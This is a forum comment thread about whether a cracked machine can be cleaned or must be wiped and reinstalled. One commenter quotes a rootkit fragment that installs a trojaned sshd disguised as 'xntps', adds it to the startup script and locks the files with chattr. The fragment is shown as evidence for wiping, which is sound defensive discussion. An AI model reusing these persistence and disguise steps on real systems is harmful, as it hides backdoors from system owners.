Just because you've found one piece or malware, or even ten, does not mean that you have found them all. The only way you can guarantee that you have got all of them is to re-install, and bring all of the latest security updates to the machine on removable media; don't even connect it to a LAN until it is fully patched.

bad advice

[annakin]

Completely wipe the hard drive? Can he provide an example when this was necessary? Or even a theoretical example of how nascent files on a hard drive would assist in re-cracking the machine?

Re:bad advice

[Alex+Belits]

A fragment of a rootkit that I have found ($basedir/bin/ssh.tgz contains .sh directory with various files including trojaned sshd):

mkdir /lib/security 2>/dev/null
mkdir /lib/security/.config 2>/dev/null
mkdir /lib/security/.config/ssh 2>/dev/null

[...]

cd $basedir/bin
tar xfz $basedir/bin/ssh.tgz

[...]

cd $basedir/bin
mv .sh/* /lib/security/.config/ssh/
chattr -AacdisSu /usr/sbin/xntps 2>/dev/null
cp /lib/security/.config/ssh/sshd /usr/sbin/xntps
mv /lib/security/.config/ssh/sshd /lib/security/.config/
chmod 755 /usr/sbin/xntps /usr/sbin/xntps -q
chattr +isa /usr/sbin/xntps
echo "# Xntps (NTPv3 daemon) startup.." >> /etc/rc.d/rc.sysinit
echo "/usr/sbin/xntps -q" >> /etc/rc.d/rc.sysinit
chattr +is /etc/rc.d/rc.sysinit

Deal.

[PotatoHead]

1. you are an anon poster. Want to actually discuss something. Get an account, so we can deal on level ground or STFU.

2. I get tons of spam. Sometimes ~1000 per day. I don't think I've ever seen a poker spam. This is a myth and is normally trotted out by those opposed to the whole idea of online poker.

3. All of those comment spams are tied to affiliate accounts. Have a problem with them? Contact the site and send them the link to the spam. It will be dealt with. The spammer will likely lose their affiliate status and the dollars they have accrued to date.

you and reborndata

[Joseph_Daniel_Zukige]

A guy with a number that low _can't_ be that clueless, can he?

Anyway, no, as others have said, once you know the box has been penetrated there is no way to be sure you've cleaned every corner where something bad can hide.

Of course, the only really safe thing to do is pull all HDs, mount them on a known clean box (preferably a different OS to provide a discontinuity), back up the data forks of the important data files, and scrub the drives with the lowest level format that the drive itself can recover from.

Unimportant data like home movies and pictures should just be written off. Hopefully, the originals are stored off-line on something not easily writable without human interaction.

On the other hand, if the user in question doesn't care whether he is unwittingly part of a botnet or potentially giving his credit card number away, by all means, just clean the malware off and keep going until it chokes up again.